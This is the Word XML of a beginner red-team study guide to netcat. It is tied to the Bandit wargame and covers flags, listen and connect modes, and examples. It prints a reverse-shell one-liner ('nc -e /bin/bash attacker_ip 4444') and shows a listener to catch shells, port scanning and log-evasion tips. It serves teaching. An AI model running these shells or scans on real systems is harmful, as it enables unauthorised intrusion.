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60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t xml:space="preserve">Command Deep Dive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">nc  •  openssl  •  ssh  •  scp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="1440" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="777777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Every flag, every option — explained for a red team beginner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="999999"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Red Team Learning Journey — April 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">How to Read This Document</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Every command is broken into three parts:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The syntax line </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">— the general pattern of how to write the command.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The flags table </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">— every important option explained, plus why a red teamer cares about it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Real examples </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">— full commands you can actually run, not just theory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E75B6" w:sz="12"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="100"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Whenever you see a flag you do not recognise on the Bandit server, run:  man nc  or  man ssh  — the manual is always there and always accurate. This document teaches you how to read those manuals faster.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Netcat (nc)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Netcat opens a raw TCP or UDP connection between two machines and lets data flow freely in both directions. It has no protocol of its own — it just moves bytes. That simplicity is what makes it so powerful and so widely used in hacking.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Think of it as a phone call between two terminals. Once connected, whatever you type on one end appears on the other.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1  Basic Syntax</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nc [options] [hostname or IP] [port]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The hostname/IP and port are only needed in connect mode (when you are reaching out to something). In listen mode you only need the port.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2  The Two Modes — Connect vs Listen</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Connect Mode  (you go to them)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nc 192.168.1.5 4444</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You are the client. You reach out to a machine at 192.168.1.5 on port 4444. If something is listening there, a connection opens.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Listen Mode  (they come to you)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -l -p 4444</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You are the server. You open port 4444 and wait. When another machine connects, the channel opens. This is how you catch reverse shells in red teaming.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3  All Important Flags — Explained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Flag / Option</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What it does</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Red Team relevance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Listen mode — wait for an incoming connection instead of connecting outward.</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Used to set up a listener to catch reverse shells from a compromised machine.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-p [port]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Specify the port to listen on (used with -l).</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You choose which port your listener opens on. Pick something that blends in — e.g. port 80 or 443.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-v</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Verbose — prints connection info as it happens (who connected, when).</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Always use -v when testing so you can see if a connection was actually made or silently failed.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-vv</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Very verbose — even more detail about the connection.</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Useful when debugging why a connection is not working — shows exact bytes and timings.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-u</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Use UDP instead of TCP.</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Some services run on UDP. Also useful for UDP-based exploits and firewall evasion in certain scenarios.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No DNS resolution — treat all addresses as raw IPs, do not look up hostnames.</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Faster and quieter — DNS lookups can be logged. Always use -n in real engagements.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-z</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Zero-I/O mode — connect and immediately close. Used for port scanning only.</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Quickly check if a port is open without sending any data: nc -zv target 80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-w [seconds]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Timeout — give up after this many seconds if no connection.</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Prevents nc from hanging forever on closed ports. Use -w 1 for fast scanning.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-e [program]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Execute a program and attach its input/output to the connection.</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Classic reverse shell: nc -e /bin/bash attacker_ip 4444 — sends a shell to the attacker. Often disabled in modern nc builds for security.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Keep listening after a client disconnects (keep-alive). Used with -l.</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Lets your listener accept multiple incoming connections one after another without restarting.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-q [seconds]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After input ends (EOF), wait this many seconds before closing.</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Useful when piping data — gives the remote end time to respond before nc exits.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-c [command]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Same as -e but passes the command to /bin/sh. Alternative to -e.</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Another way to get a shell. nc -c bash — slightly different syntax, same concept.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">1.4  Real Examples with Full Explanation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Example 1 — Bandit Level 14 (send password to a port)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/bandit_pass/bandit14 | nc localhost 30000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">cat reads the file and outputs the password to stdout.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">| pipes that output as input to nc.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">nc localhost 30000 connects to port 30000 on the same machine and sends the password.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Bandit program on port 30000 receives it, checks it, and replies with the next password.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Example 2 — Simple port scan (check if ports are open)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -zv 192.168.1.5 20-100</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-z means scan only — do not send data, just check if port is open.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-v means print the result for each port.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">20-100 is a port range — checks all ports from 20 to 100.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Example 3 — Set up a listener to catch a reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -lvp 4444</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-l means listen.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-v means verbose — show when someone connects.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-p 4444 means open on port 4444.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When a compromised machine runs nc -e /bin/bash your_ip 4444, it connects back to you and you get a shell.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Example 4 — Simple chat between two terminals (great for understanding)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">On machine A (listener):  nc -lp 9999</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">On machine B (connector):  nc [IP of machine A] 9999</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Now anything you type on either side appears on the other. This is exactly how a reverse shell works — except instead of you typing, a compromised machine sends you its bash output.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="C0392B" w:sz="12"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="100"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Red Team Use: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
